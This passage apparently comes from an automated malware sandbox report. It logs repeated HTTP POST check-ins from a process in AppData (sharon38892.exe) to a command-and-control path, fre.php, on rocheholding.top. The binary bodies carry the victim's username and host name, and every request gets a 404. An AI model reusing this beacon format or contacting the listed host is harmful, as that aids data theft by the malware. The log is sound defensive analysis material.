                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5uUVRK43eaTncayfHBlitki2C6yzYkX8cFsRRoMCIUQaN9v6xXhg%2FnmCyUs3BtcAv9nVdk24DzZ5YdgMW02FgNwo5hd97A4juX608AOfWIlp%2B7Dpx0kYPbTUcThJFBhLgrz"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c399db47c7b-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      38192.168.2.2249202188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:18.976087093 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:19.027724028 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:19.808820963 CEST631INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mgwJiYN2qcEqtPxRplNy%2FlBWaoy4aIWe5TxgEapQ4B%2B96ZumUL9FMG8ko0ybH9eIrzvDqmUJcLJNCuqHntiGITHElJ3Qs4ncPI2%2FcKFs%2BC%2FQ6LM8r1J%2BSs2CvLv6kn1FRk%2F"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c3faa62c33a-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      39192.168.2.2249203188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:19.988815069 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:20.039690018 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:20.721458912 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2%2FAONJaM0ZWFEdxawbuwRHp7dPCBsszkfjaJ95ub5Z9gFqz9tE71AQ%2BuCqK5Dyrn%2Bp4P0Ge%2BVQiFreCHHnU6YgzUmEmXbxMXUfeAFc%2FWfFawD2O0FU4YIYj4mUY3aWRe7xw"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c458ff317c1-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      40192.168.2.2249204188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:20.882874012 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:20.935875893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:21.692867041 CEST617INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eIJEuFPaZq6Vm9gdZBXJ3HYIhPvYAEmmx7vschgH8GHm32u4G1FQgiaks8dQ3W8CKiS4DVcdwN41CiV4i1RQEKyxoAgwHGvDSoDsMIKWh6FNECEj8Qz8aF5vXBvq8ixyGBbd"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c4b399f43cb-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      41192.168.2.2249205188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:21.836224079 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:21.888267994 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:22.626806021 CEST619INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sa6U57zeltuA09uNqaHqp9eCR1uZ%2Fqh69YEqbCjeFSVgrpWrrur0xPKbjYmj6bf0xtlPVVGlFQAnFug9GopTOJbBy0LIg0MtuYQ3m62SrQVwcGCOuACFRs3pAj3ydWCrfCsE"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c512cf75e61-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      42192.168.2.2249206188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:22.772747993 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:22.823609114 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:23.512218952 CEST621INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6WnGrbKfWZmhJ%2FXYCQDNZZL2roCxzHdeHG1WRmZC%2BmSiobCZQOdMwAUr3uGRo9qyQX5WgUx0idH3I1f4VyxL1C6EeTx45pcxm4Hw6F22F1ZjhQilQH5QtA9ryZwKBzybzxiw"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c56ed1842c0-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      43192.168.2.2249207188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:23.674890041 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:23.724689007 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:24.406585932 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ufebBTowIZrNT3Yvyd%2Ba7EMX4vGhsWFikVZYuwhw63y%2BwvN5%2FESmkTHKPlddz541gwBkQBjLelPXRql29KtbVdbLZyhfZK29oNqFgKd%2FUiPJvaIrXr0BjtkX%2Fhe312FV3fyc"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c5c9a120fa8-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      44192.168.2.2249208188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:24.566045046 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:24.619584084 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:25.323944092 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skR04UTVTnwWcgXK71cWplLkmzaplcGw5nNZ%2BaidaJ0NwocGXlJk2x0LnZm3RLLJUNwtwYWhI9Gn4wafIrsKGK51iXOOlwNqwXcHDoi%2F0pAQNqna%2BIupf%2F8ium6D%2FzAKMPxS"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c622a945e6d-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      45192.168.2.2249209188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:25.484709978 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:25.540275097 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:26.225308895 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pyJs516rFD%2BECmbzvPdHl9MCwdH6ab6ZZfSy%2FesGNnVQyS5Xe6cfvgC3T7WdkU2CIjHjlB4TNH9Xc0oWetwnazAcqtvddepZv3QRuc0BelFeFjv4yGut1g40bRKp%2FhZ4XpRu"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c67fbd1c356-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      46192.168.2.2249210188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:26.597771883 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:26.644923925 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:27.352135897 CEST621INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sgNv8xt6emlf2DKousDoL9sBWj7RJOUJXvQxyt0Txc0vNFB3tKHRxPlhmieeSBTGZX9gIZUNpmgSh9OM03Lc3doGNi6zvtWsI%2FBLch26b9%2BAUxo0173ocijKDTnHzAJPn375"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c6efe2e72a1-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      47192.168.2.2249211188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:27.512891054 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:27.564429045 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:28.221432924 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oq06SMb3xCBh6xCXXBVCggpS7h2lg%2BelT7O48iKRiJbdSjHm9DUc8Nj%2BjW4VkxnNnCyDwMVYwUF5IYR31hXQX7qpG3tmWxThdPt3%2FvGlPhYBAnbHRBLBGexh58W5K143IIdM"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c7488ee4263-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      48192.168.2.2249212188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:28.376454115 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:28.429852962 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:29.124516010 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aedBF0RyWPgJ4cAB816%2BxY2%2Fly1U7B7Q%2B1spCXg%2FTcIPJdtxXzGRAPhkNNAvitIYSHw8XX7KLnCTuMN5eI4ZMUl8csUh5F6279YkW8JaY7%2BsVXDUezG1M0SRHwkAfSW2VXDR"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c79e8ec43fb-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      49192.168.2.2249213188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:29.294238091 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:29.348448992 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:29.934037924 CEST621INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fiIDfSTUutajvyZaYUVp84f7Xh5PWL2Gd9oy2SZuW3vswjd0IMae2LGe9LdA%2F3bqFevKsSSMoE7jEr9RSvZvMnSE25Uiyhmv2pVFQSyWD%2F4JAkgAnd9gnmz79whThzTKNEaw"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c7fca041921-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      50192.168.2.2249214188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:30.098367929 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:30.149559975 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:30.812721968 CEST633INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0xD0tV2XrX8Is8TSWS%2BLSIKSbUY0LZ%2B2%2BZRKePwsJPNeDLb0YMObtRH0BMrDOMuUSRqWZarkhDNz6%2FmuGOvM45l6HcBzz%2Fui%2Fillix9CSrz%2BCmtGN%2BbS7CsIhbsgKX72yCfH"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c84a9e842dd-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      51192.168.2.2249215188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:30.957361937 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:18:31.008379936 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:18:31.553235054 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:18:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilphZhoz1dVfbbipD95a%2FLd7ANxUE6rfinFkZrlxxyOo7VgLnQa7DkTy%2F0zkkNakggIKqwdUkjHEiH208yss2zrw1lADe8iFBEYNlxBIVSyeojCSPZIL0%2FB6pkRBK1TVVaeX"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870c8a0a591859-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      52192.168.2.2249216188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:18:31.712532043 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
